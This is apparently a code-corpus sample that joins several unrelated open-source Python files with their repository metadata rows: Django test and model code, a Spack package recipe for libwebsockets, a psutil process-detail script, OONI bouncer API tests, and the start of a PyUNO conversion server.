self.assertTrue(self.lc_block.source_library_version)
self.assertEqual(self.lc_block.source_library_version, duplicate.source_library_version)
problem2_in_course = store.get_item(duplicate.children[0])
self.assertEqual(problem2_in_course.display_name, self.original_display_name)
class TestIncompatibleModuleStore(LibraryTestCase):
"""
Tests for proper validation errors with an incompatible course modulestore.
"""
def setUp(self):
super(TestIncompatibleModuleStore, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
# Create a course in an incompatible modulestore.
with modulestore().default_store(ModuleStoreEnum.Type.mongo):
self.course = CourseFactory.create()
# Add a LibraryContent block to the course:
self.lc_block = self._add_library_content_block(self.course, self.lib_key)
def test_incompatible_modulestore(self):
"""
Verifies that, if a user is using a modulestore that doesn't support libraries,
a validation error will be produced.
"""
validation = self.lc_block.validate()
self.assertEqual(validation.summary.type, validation.summary.ERROR)
self.assertIn(
"This course does not support content libraries.", validation.summary.text)
| agpl-3.0 | 7,295,077,615,141,590,000 | 42.283381 | 118 | 0.641595 | false |
skosukhin/spack | var/spack/repos/builtin/packages/libwebsockets/package.py | 1 | 1834 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Libwebsockets(CMakePackage):
"""C library for lightweight websocket clients and servers."""
homepage = "https://github.com/warmcat/libwebsockets"
url = "https://github.com/warmcat/libwebsockets/archive/v2.1.0.tar.gz"
version('2.2.1', '1f641cde2ab3687db3d553f68fe0f620')
version('2.1.1', '674684ffb90d4a0bcf7a075eb7b90192')
version('2.1.0', '4df3be57dee43aeebd54a3ed56568f50')
version('2.0.3', 'a025156d606d90579e65d53ccd062a94')
version('1.7.9', '7b3692ead5ae00fd0e1d56c080170f07')
depends_on('zlib')
depends_on('openssl')
| lgpl-2.1 | -4,229,960,590,508,280,300 | 43.731707 | 79 | 0.685387 | false |
adieyal/billtracker | code/billtracker/scrapers/models.py | 1 | 3436 | from django.db import models
from django.conf import settings
import bills.models as bill_models
class GovInfoScraper(models.Model):
bill_name = models.CharField(max_length=100)
bill_code = models.CharField(max_length=10)
comment_startdate = models.DateField()
comment_enddate = models.DateField()
scrape_date = models.DateTimeField(auto_now_add=True)
url = models.URLField(null=True, blank=True)
reviewed = models.BooleanField(default=False)
def convert_to_bill(self):
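        # Create a Bill and its pre-parliamentary stage from this scraped record (single conversion only).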
if self.reviewed:
raise bill_models.BillException("Cannot re-convert once already converted")
bill = bill_models.Bill.objects.create(
name=self.bill_name,
code=self.bill_code,
)
bill_models.PreparliamentaryStage.objects.create(
bill=bill,
comments_start=self.comment_startdate,
comments_end=self.comment_enddate,
document_url=self.url
)
self.reviewed = True
self.save()
return bill
def __unicode__(self):
return "[%s] %s" % (self.bill_code, self.bill_name)
class BillsBeforeParliamentScraper(models.Model):
bill_name = models.CharField(max_length=100)
bill_code = models.CharField(max_length=10)
introduced_by = models.CharField(max_length=100)
date_introduced = models.DateField()
bill_stage = models.CharField(max_length=3, choices=[
("1", "National Assembly"),
("2", "NCOP"),
("3", "Sent to President"),
("4", "Finalised in an Act"),
("5", "Withdrawn"),
])
document_number = models.CharField(max_length=10)
url = models.URLField(null=True, blank=True)
committee = models.CharField(max_length=100, null=True, blank=True)
reviewed = models.BooleanField(default=False)
# TODO - add NCOP and Presidential stages
def convert_to_bill(self):
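        # Reuse an existing Bill with this code if one exists; otherwise create it, then record its introduction to Parliament.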
if self.reviewed:
raise bill_models.BillException("Cannot re-convert once already converted")
try:
bill = bill_models.Bill.objects.get(code=self.bill_code)
except bill_models.Bill.DoesNotExist:
bill = bill_models.Bill.objects.create(
name=self.bill_name,
code=self.bill_code,
)
bill_models.ParliamentIntroduction.objects.create(
bill=bill,
introduced_by=self.introduced_by,
date_introduced=self.date_introduced,
document_number=self.document_number,
url=self.url
)
if self.committee:
bill_models.ParliamentPortfolioCommittee.objects.create(
bill=bill,
committee=self.committee
)
self.reviewed = True
self.save()
return bill
def __unicode__(self):
return "[%s] %s" % (self.bill_code, self.bill_name)
class Meta:
verbose_name_plural = "Bills before parliament"
verbose_name = "Bills before parliament"
class ParliamentMinutesScraper(models.Model):
filename = models.FileField(upload_to=settings.DIR_PARLIAMENT_MINUTES)
house = models.CharField(max_length=20)
language = models.CharField(max_length=20)
date = models.DateField()
scrape_date = models.DateTimeField(auto_now_add=True)
url = models.URLField()
def __unicode__(self):
return "%s - %s" % (self.scrape_date, self.house)
| bsd-3-clause | -3,848,321,381,667,851,000 | 32.686275 | 87 | 0.625146 | false |
tamentis/psutil | examples/process_detail.py | 1 | 4156 | #!/usr/bin/env python
#
# $Id$
#
# Copyright (c) 2009, Jay Loden, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Print detailed information about a process.
"""
import os
import datetime
import socket
import sys
import psutil
def convert_bytes(n):
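    # Convert a raw byte count into a human-readable string, e.g. 1048576 -> '1.0M'.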
symbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
prefix = {}
for i, s in enumerate(symbols):
prefix[s] = 1 << (i+1)*10
for s in reversed(symbols):
if n >= prefix[s]:
value = float(n) / prefix[s]
return '%.1f%s' % (value, s)
return "%sB" % n
def print_(a, b):
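    # Print the label in bold green when writing to a POSIX terminal.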
    if sys.stdout.isatty() and os.name == 'posix':
        fmt = '\x1b[1;32m%-17s\x1b[0m %s' % (a, b)
    else:
        fmt = '%-15s %s' % (a, b)
# python 2/3 compatibility layer
sys.stdout.write(fmt + '\n')
sys.stdout.flush()
def run(pid):
p = psutil.Process(pid)
if p.parent:
parent = '(%s)' % p.parent.name
else:
parent = ''
    started = datetime.datetime.fromtimestamp(p.create_time).strftime('%Y-%m-%d %H:%M')
if hasattr(p, 'get_io_counters'):
io = p.get_io_counters()
mem = p.get_memory_info()
mem = '%s%% (resident=%s, virtual=%s) ' %(round(p.get_memory_percent(), 1),
convert_bytes(mem.rss),
convert_bytes(mem.vms))
cpu_times = p.get_cpu_times()
cpu_percent = p.get_cpu_percent(0)
children = p.get_children()
files = p.get_open_files()
threads = p.get_threads()
connections = p.get_connections()
print_('pid', p.pid)
print_('name', p.name)
print_('exe', p.exe)
print_('parent', '%s %s' % (p.ppid, parent))
print_('cmdline', ' '.join(p.cmdline))
print_('started', started)
print_('user', p.username)
if os.name == 'posix':
print_('uids', 'real=%s, effective=%s, saved=%s' % p.uids)
print_('gids', 'real=%s, effective=%s, saved=%s' % p.gids)
print_('terminal', p.terminal or '')
if hasattr(p, 'getcwd'):
print_('cwd', p.getcwd())
print_('memory', mem)
print_('cpu', '%s%% (user=%s, system=%s)' % (cpu_percent,
cpu_times.user,
cpu_times.system))
print_('status', p.status)
print_('niceness', p.nice)
print_('num threads', p.get_num_threads())
if hasattr(p, 'get_io_counters'):
print_('I/O', 'bytes-read=%s, bytes-written=%s' % \
(convert_bytes(io.read_bytes),
convert_bytes(io.write_bytes)))
if children:
print_('children', '')
for child in children:
print_('', 'pid=%s name=%s' % (child.pid, child.name))
if files:
print_('open files', '')
for file in files:
print_('', 'fd=%s %s ' % (file.fd, file.path))
if threads:
print_('running threads', '')
for thread in threads:
print_('', 'id=%s, user-time=%s, sys-time=%s' \
% (thread.id, thread.user_time, thread.system_time))
if connections:
print_('open connections', '')
for conn in connections:
if conn.type == socket.SOCK_STREAM:
type = 'TCP'
elif conn.type == socket.SOCK_DGRAM:
type = 'UDP'
else:
type = 'UNIX'
lip, lport = conn.local_address
if not conn.remote_address:
rip, rport = '*', '*'
else:
rip, rport = conn.remote_address
print_('', '%s:%s -> %s:%s type=%s status=%s' \
% (lip, lport, rip, rport, type, conn.status))
def main(argv=None):
if argv is None:
argv = sys.argv
if len(argv) == 1:
sys.exit(run(os.getpid()))
elif len(argv) == 2:
sys.exit(run(int(argv[1])))
else:
sys.exit('usage: %s [pid]' % __file__)
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | 8,451,998,020,740,110,000 | 31.46875 | 87 | 0.492541 | false |
dstufft/ooni-backend | oonib/test/test_bouncer.py | 1 | 17723 | # -*- encoding: utf8 -*-
import json
from twisted.internet import defer
from cyclone import web
from oonib.bouncer.api import bouncerAPI
from oonib.test.handler_helpers import HandlerTestCase
fake_bouncer_file = """
collector:
fake_address:
policy:
input:
- {id: fake_id}
nettest:
- {name: fake_nettest, version: 1.0}
- {name: another_fake_nettest, version: 2.0}
test-helper: {fake_test_helper: 'fake_hostname'}
"""
fake_default_collector = """
collector:
fake_address:
policy:
input:
- {id: fake_id}
nettest:
- {name: fake_nettest, version: 1.0}
- {name: another_fake_nettest, version: 2.0}
test-helper: {fake_test_helper: 'fake_hostname'}
default_collector:
test-helper: {fake_test_helper: 'fake_hostname'}
"""
fake_bouncer_file_multiple_collectors = """
collector:
fake_addressA:
policy:
input:
- {id: fake_id}
nettest:
- {name: fake_nettest, version: 1.0}
- {name: another_fake_nettest, version: 2.0}
test-helper: {fake_test_helper: 'fake_hostname'}
fake_addressB:
policy:
input:
- {id: fake_id}
nettest:
- {name: fake_nettest, version: 1.0}
- {name: another_fake_nettest, version: 2.0}
test-helper: {fake_test_helper: 'fake_hostname'}
"""
fake_for_test_helper_request = """
collector:
fake_addressA:
policy:
input:
- {id: fake_id}
nettest:
- {name: fake_nettest, version: 1.0}
test-helper: {fake_test_helper: 'fake_hostname', exotic_test_helper: 'fake_hostname'}
fake_addressB:
test-helper: {fake_test_helper: 'fake_hostname'}
"""
reports_dir = 'data/reports'
archive_dir = 'data/archive'
input_dir = 'data/inputs'
decks_dir = 'data/decks'
bouncer_filename = 'fake_bouncer_file.yaml'
fake_config_file = """
main:
report_dir: %s
archive_dir: %s
input_dir: %s
deck_dir: %s
bouncer_file: %s
helpers:
fake_test_helper:
attribute: value
""" % (reports_dir, archive_dir, input_dir, decks_dir, bouncer_filename)
class BaseTestBouncer(HandlerTestCase):
def setUp(self, *args, **kw):
self.make_dir(reports_dir)
self.make_dir(archive_dir)
self.make_dir(input_dir)
self.make_dir(decks_dir)
self.config_filename = 'fake_config.conf'
with open(self.config_filename, 'w') as config_file:
config_file.write(fake_config_file)
super(BaseTestBouncer, self).setUp()
self.filenames.add(bouncer_filename)
self.filenames.add(self.config_filename)
class TestBouncer(BaseTestBouncer):
app = web.Application(bouncerAPI, name='bouncerAPI')
def setUp(self, *args, **kw):
with open(bouncer_filename, 'w') as bouncer_file:
bouncer_file.write(fake_bouncer_file)
super(TestBouncer, self).setUp()
@defer.inlineCallbacks
def test_void_net_tests(self):
data = {
'net-tests': [
{
"test-helpers": ['fake_test_helper'],
"input-hashes": [],
"name": '',
"version": '',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('collector-not-found', response_body['error'])
@defer.inlineCallbacks
def test_net_tests(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('version', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['version'], '1.0')
self.assertIn('input-hashes', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['input-hashes']), 0)
self.assertIn('test-helpers', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['test-helpers']), 0)
self.assertIn('collector', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['collector'], 'fake_address')
@defer.inlineCallbacks
def test_backward_compatibility(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('version', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['version'], '1.0')
self.assertIn('input-hashes', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['input-hashes']), 0)
self.assertIn('test-helpers', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['test-helpers']), 0)
self.assertIn('collector', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['collector'], 'fake_address')
@defer.inlineCallbacks
def test_multiple_net_tests(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
{
"test-helpers": [],
"input-hashes": [],
"name": 'another_fake_nettest',
"version": '1.0',
}
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 2)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('name', response_body['net-tests'][1])
self.assertEqual(response_body['net-tests'][1]['name'], 'another_fake_nettest')
@defer.inlineCallbacks
def test_invalid_net_test(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'invalid_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('collector-not-found', response_body['error'])
@defer.inlineCallbacks
def test_net_tests_with_input(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": ['fake_id'],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('input-hashes', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['input-hashes']), 1)
self.assertEqual(response_body['net-tests'][0]['input-hashes'][0], 'fake_id')
@defer.inlineCallbacks
def test_net_tests_with_input_invalid_id(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": ['invalid_id'],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('collector-not-found', response_body['error'])
@defer.inlineCallbacks
def test_net_tests_with_test_helper(self):
data = {
'net-tests': [
{
"test-helpers": ['fake_test_helper'],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('test-helpers', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['test-helpers']), 1)
self.assertEqual(response_body['net-tests'][0]['test-helpers']['fake_test_helper'], 'fake_hostname')
@defer.inlineCallbacks
def test_net_tests_with_invalid_test_helper(self):
data = {
'net-tests': [
{
"test-helpers": ['invalid_test_helper'],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('collector-not-found', response_body['error'])
@defer.inlineCallbacks
def test_invalid_request(self):
data = {
'something_weird': 'nsa'
}
response = yield self.request('/bouncer', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('test-helpers-or-net-test-key-missing', response_body['error'])
class TestDefaultCollector(BaseTestBouncer):
app = web.Application(bouncerAPI, name='bouncerAPI')
def setUp(self, *args, **kw):
with open(bouncer_filename, 'w') as bouncer_file:
bouncer_file.write(fake_default_collector)
super(TestDefaultCollector, self).setUp()
@defer.inlineCallbacks
def test_default_collector(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'imaginary_nettest',
"version": '1.0',
}
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'imaginary_nettest')
self.assertIn('version', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['version'], '1.0')
self.assertIn('input-hashes', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['input-hashes']), 0)
self.assertIn('test-helpers', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['test-helpers']), 0)
self.assertIn('collector', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['collector'], 'default_collector')
class TestMultipleCollectors(BaseTestBouncer):
app = web.Application(bouncerAPI, name='bouncerAPI')
def setUp(self, *args, **kw):
with open(bouncer_filename, 'w') as bouncer_file:
bouncer_file.write(fake_bouncer_file_multiple_collectors)
super(TestMultipleCollectors, self).setUp()
@defer.inlineCallbacks
def test_multiple_collectors(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('version', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['version'], '1.0')
self.assertIn('input-hashes', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['input-hashes']), 0)
self.assertIn('test-helpers', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['test-helpers']), 0)
self.assertIn('collector', response_body['net-tests'][0])
self.assertIn(response_body['net-tests'][0]['collector'], ['fake_addressA', 'fake_addressB'])
class TestHelperTests(BaseTestBouncer):
app = web.Application(bouncerAPI, name='bouncerAPI')
def setUp(self, *args, **kw):
with open(bouncer_filename, 'w') as bouncer_file:
bouncer_file.write(fake_for_test_helper_request)
super(TestHelperTests, self).setUp()
@defer.inlineCallbacks
def test_invalid_helper(self):
data = {
'test-helpers': ['invalid_test_helper']
}
response = yield self.request('/bouncer/test-helpers', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('test-helper-not-found', response_body['error'])
@defer.inlineCallbacks
def test_multiple_collectors(self):
data = {
'test-helpers': ['fake_test_helper']
}
response = yield self.request('/bouncer/test-helpers', 'POST', data)
response_body = json.loads(response.body)
self.assertEqual(len(response_body), 2)
self.assertIn('fake_test_helper', response_body)
self.assertIn('collector', response_body['fake_test_helper'])
self.assertIn(response_body['fake_test_helper']['collector'], ['fake_addressA', 'fake_addressB'])
self.assertIn('address', response_body['fake_test_helper'])
self.assertEqual('fake_hostname', response_body['fake_test_helper']['address'])
self.assertIn('default', response_body)
self.assertIn('collector', response_body['default'])
self.assertEqual('fake_addressB', response_body['default']['collector'])
@defer.inlineCallbacks
def test_backward_compatibility(self):
data = {
'test-helpers': ['fake_test_helper']
}
response = yield self.request('/bouncer', 'POST', data)
response_body = json.loads(response.body)
self.assertEqual(len(response_body), 2)
self.assertIn('fake_test_helper', response_body)
self.assertIn('collector', response_body['fake_test_helper'])
self.assertIn(response_body['fake_test_helper']['collector'], ['fake_addressA', 'fake_addressB'])
self.assertIn('address', response_body['fake_test_helper'])
self.assertEqual('fake_hostname', response_body['fake_test_helper']['address'])
self.assertIn('default', response_body)
self.assertIn('collector', response_body['default'])
self.assertEqual('fake_addressB', response_body['default']['collector'])
@defer.inlineCallbacks
def test_multiple_helpers(self):
data = {
'test-helpers': ['fake_test_helper', 'exotic_test_helper']
}
response = yield self.request('/bouncer/test-helpers', 'POST', data)
response_body = json.loads(response.body)
self.assertEqual(len(response_body), 3)
self.assertIn('fake_test_helper', response_body)
self.assertIn('exotic_test_helper', response_body)
self.assertIn('default', response_body)
self.assertIn(response_body['fake_test_helper']['collector'], ['fake_addressA', 'fake_addressB'])
self.assertEqual(response_body['exotic_test_helper']['collector'], 'fake_addressA')
self.assertEqual('fake_addressB', response_body['default']['collector'])
| bsd-2-clause | -617,926,981,280,456,400 | 35.243354 | 108 | 0.567342 | false |
TimoRoth/oggm | oggm/cli/benchmark.py | 2 | 8716 | """Command line arguments to the oggm_benchmark command
Type `$ oggm_benchmark -h` for help
"""
# External modules
import os
import sys
import argparse
import time
import logging
import pandas as pd
import geopandas as gpd
# Locals
import oggm.cfg as cfg
from oggm import utils, workflow, tasks
from oggm.exceptions import InvalidParamsError
def _add_time_to_df(df, index, t):
df.loc[index, 't'] = t
m, s = divmod(t, 60)
h, m = divmod(m, 60)
df.loc[index, 'H'] = h
df.loc[index, 'M'] = m
df.loc[index, 'S'] = s
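# For illustration: _add_time_to_df(df, 'some_task', 3725.0) records
# t=3725.0 together with H=1.0, M=2.0, S=5.0 on the 'some_task' row
# ('some_task' is a hypothetical index label).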
def run_benchmark(rgi_version=None, rgi_reg=None, border=None,
output_folder='', working_dir='', is_test=False,
test_rgidf=None, test_intersects_file=None,
test_topofile=None):
"""Does the actual job.
Parameters
----------
rgi_version : str
the RGI version to use (defaults to cfg.PARAMS)
rgi_reg : str
the RGI region to process
border : int
the number of pixels at the maps border
output_folder : str
path to the output folder (where to put the preprocessed tar files)
working_dir : str
path to the OGGM working directory
is_test : bool
to test on a couple of glaciers only!
test_rgidf : shapefile
for testing purposes only
test_intersects_file : shapefile
for testing purposes only
test_topofile : str
for testing purposes only
"""
# Module logger
log = logging.getLogger(__name__)
# Params
params = {}
# Local paths
utils.mkdir(working_dir)
params['working_dir'] = working_dir
# Initialize OGGM and set up the run parameters
cfg.initialize(logging_level='WORKFLOW', params=params, future=True)
# Use multiprocessing?
cfg.PARAMS['use_multiprocessing'] = True
# How many grid points around the glacier?
# Make it large if you expect your glaciers to grow large
cfg.PARAMS['border'] = border
# Set to True for operational runs
cfg.PARAMS['continue_on_error'] = True
# For statistics
odf = pd.DataFrame()
if rgi_version is None:
rgi_version = cfg.PARAMS['rgi_version']
base_dir = os.path.join(output_folder)
# Add a package version file
utils.mkdir(base_dir)
opath = os.path.join(base_dir, 'package_versions.txt')
with open(opath, 'w') as vfile:
vfile.write(utils.show_versions(logger=log))
# Read RGI
start = time.time()
if test_rgidf is None:
# Get the RGI file
rgidf = gpd.read_file(utils.get_rgi_region_file(rgi_reg,
version=rgi_version))
# We use intersects
rgif = utils.get_rgi_intersects_region_file(rgi_reg,
version=rgi_version)
cfg.set_intersects_db(rgif)
else:
rgidf = test_rgidf
cfg.set_intersects_db(test_intersects_file)
if is_test:
# Just for fun
rgidf = rgidf.sample(2)
_add_time_to_df(odf, 'Read RGI', time.time()-start)
# Sort for more efficient parallel computing
rgidf = rgidf.sort_values('Area', ascending=False)
log.workflow('Starting prepro run for RGI reg: {} '
'and border: {}'.format(rgi_reg, border))
log.workflow('Number of glaciers: {}'.format(len(rgidf)))
# Input
if test_topofile:
cfg.PATHS['dem_file'] = test_topofile
utils.apply_test_ref_tstars()
# Initialize working directories
start = time.time()
gdirs = workflow.init_glacier_directories(rgidf, reset=True, force=True)
_add_time_to_df(odf, 'init_glacier_directories', time.time()-start)
# Tasks
task_list = [
tasks.define_glacier_region,
tasks.process_cru_data,
tasks.glacier_masks,
tasks.compute_centerlines,
tasks.initialize_flowlines,
tasks.compute_downstream_line,
tasks.compute_downstream_bedshape,
tasks.catchment_area,
tasks.catchment_intersections,
tasks.catchment_width_geom,
tasks.catchment_width_correction,
tasks.local_t_star,
tasks.mu_star_calibration,
tasks.prepare_for_inversion,
tasks.mass_conservation_inversion,
tasks.filter_inversion_output,
tasks.init_present_time_glacier,
]
for task in task_list:
start = time.time()
workflow.execute_entity_task(task, gdirs)
_add_time_to_df(odf, task.__name__, time.time()-start)
# Runs
start = time.time()
workflow.execute_entity_task(tasks.run_random_climate, gdirs,
nyears=250, bias=0, seed=0,
output_filesuffix='_tstar')
_add_time_to_df(odf, 'run_random_climate_tstar_250', time.time()-start)
start = time.time()
workflow.execute_entity_task(tasks.run_random_climate, gdirs,
nyears=250, y0=1995, seed=0,
output_filesuffix='_commit')
_add_time_to_df(odf, 'run_random_climate_commit_250', time.time()-start)
# Compile results
start = time.time()
utils.compile_glacier_statistics(gdirs)
_add_time_to_df(odf, 'compile_glacier_statistics', time.time()-start)
start = time.time()
utils.compile_climate_statistics(gdirs,
add_climate_period=[1920, 1960, 2000])
_add_time_to_df(odf, 'compile_climate_statistics', time.time()-start)
start = time.time()
utils.compile_run_output(gdirs, input_filesuffix='_tstar')
_add_time_to_df(odf, 'compile_run_output_tstar', time.time()-start)
start = time.time()
utils.compile_run_output(gdirs, input_filesuffix='_commit')
_add_time_to_df(odf, 'compile_run_output_commit', time.time()-start)
# Log
opath = os.path.join(base_dir, 'benchmarks_b{:03d}.csv'.format(border))
odf.index.name = 'Task'
odf.to_csv(opath)
    log.workflow('OGGM benchmark is done!')
def parse_args(args):
"""Check input arguments and env variables"""
# CLI args
    description = ('Run an OGGM benchmark on a selected RGI Region. '
                   'This writes a benchmarks_b{border}.csv file where '
                   'the results are summarized')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('--map-border', type=int,
help='the size of the map border. Is required if '
'$OGGM_MAP_BORDER is not set.')
parser.add_argument('--rgi-reg', type=str,
help='the rgi region to process. Is required if '
'$OGGM_RGI_REG is not set.')
parser.add_argument('--rgi-version', type=str,
help='the RGI version to use. Defaults to the OGGM '
'default.')
    parser.add_argument('--working-dir', type=str,
                        help='path to the OGGM working directory. Defaults '
                             'to current directory or $OGGM_WORKDIR.')
parser.add_argument('--output', type=str,
help='path to the directory where to write the '
                             'output. Defaults to current directory or '
'$OGGM_OUTDIR.')
parser.add_argument('--test', nargs='?', const=True, default=False,
help='if you want to do a test on a couple of '
'glaciers first.')
args = parser.parse_args(args)
# Check input
rgi_reg = args.rgi_reg
if not rgi_reg:
rgi_reg = os.environ.get('OGGM_RGI_REG', None)
if rgi_reg is None:
raise InvalidParamsError('--rgi-reg is required!')
rgi_reg = '{:02}'.format(int(rgi_reg))
rgi_version = args.rgi_version
border = args.map_border
if not border:
border = os.environ.get('OGGM_MAP_BORDER', None)
if border is None:
raise InvalidParamsError('--map-border is required!')
working_dir = args.working_dir
if not working_dir:
working_dir = os.environ.get('OGGM_WORKDIR', '')
output_folder = args.output
if not output_folder:
output_folder = os.environ.get('OGGM_OUTDIR', '')
border = int(border)
output_folder = os.path.abspath(output_folder)
working_dir = os.path.abspath(working_dir)
# All good
return dict(rgi_version=rgi_version, rgi_reg=rgi_reg,
border=border, output_folder=output_folder,
working_dir=working_dir, is_test=args.test)
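# Hypothetical invocation (region, border and paths are examples only):
#   oggm_benchmark --rgi-reg 11 --map-border 80 \
#       --working-dir /tmp/oggm_wd --output /tmp/oggm_out --test
# parse_args() would return rgi_reg='11', border=80 and is_test=True for it.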
def main():
"""Script entry point"""
run_benchmark(**parse_args(sys.argv[1:]))
| bsd-3-clause | -8,687,463,995,399,151,000 | 32.394636 | 77 | 0.595686 | false |
silviot/ulif.openoffice | src/ulif/openoffice/pyunoserver.py | 1 | 13032 | ##
## pyunoserver.py
## Login : <[email protected]>
## Started on Fri Aug 28 02:13:03 2009 Uli Fouquet
## $Id$
##
## Copyright (C) 2009 Uli Fouquet
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##
"""A server that waits for requests for conversion of documents.
Important code fragments are from regular Python documentation.
"""
import os
import pkg_resources
import shutil
import signal
import socket
import sys
import tarfile
import tempfile
import threading
import SocketServer
from urlparse import urlsplit
from ulif.openoffice.cachemanager import CacheManager
from ulif.openoffice.convert import convert_to_pdf, convert
from ulif.openoffice.find import find
class ThreadedTCPRequestHandler(SocketServer.StreamRequestHandler):
"""A handler for the :class:`ThreadedTCPServer`.
It implements the protocol, the PyUNO server actually works with.
"""
def handle(self):
"""
The protocol:
The request:
.. productionlist::
REQUEST: CONVERT_CMD | FIND_CMD | TEST_CMD
CONVERT_CMD: CMD PATH
CMD: "CONVERT_PDF<NL>" | "CONVERT_HTML<NL>"
FIND_CMD: "FIND<NL>"
TEST_CMD: "TEST<NL>"
